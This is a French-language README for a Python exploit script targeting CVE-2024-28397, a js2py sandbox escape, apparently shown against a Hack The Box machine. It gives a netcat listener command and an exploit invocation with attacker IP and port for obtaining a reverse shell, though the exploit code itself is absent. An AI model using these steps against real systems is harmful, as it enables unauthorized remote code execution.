
Un script d'automatisation en Python pour exploiter la vulnérabilité **js2py Sandbox Escape** (CVE-2024-28397). Cet outil automatise le processus de génération et de livraison de la charge utile pour obtenir une exécution de code à distance (RCE) sur les instances vulnérables.
Un script d'automatisation Python pour exploiter la vulnérabilité js2py Sandbox Escape (CVE-2024-28397). Cet outil automatise la génération et la livraison de la charge utile (payload) pour exécuter du code à distance (RCE) sur des instances vulnérables.
⚠️ Avertissement légal L'utilisation de cet outil pour attaquer des cibles sans consentement mutuel préalable est illégale. Ce dépôt est à des fins éducatives uniquement. L'auteur n'est pas responsable de toute mauvaise utilisation de ces informations. Cet outil est destiné à être utilisé dans le cadre d'audits de sécurité autorisés et d'environnements Capture The Flag (CTF).
CVE-2024-28397 affecte la bibliothèque js2py (versions < 0.74). La bibliothèque ne parvient pas à isoler correctement l'environnement JavaScript de l'environnement Python hôte.
__class__ et __subclasses__.subprocess.Popen, permettant l'exécution de commandes arbitraires sur le serveur hôte.pip install requests
Démarrez votre écouteur Netcat :
nc -lvnp 1337
Exécutez le script :
python3 exploit.py -u <target url> -i <attacker ip> -p <attacker port>
Voici l'outil en action contre une cible vulnérable (Hack The Box - CodeTwo) :
Exécution de l'exploit pour générer la charge utile et déclencher le callback :

Réception du shell inverse sur l'écouteur :
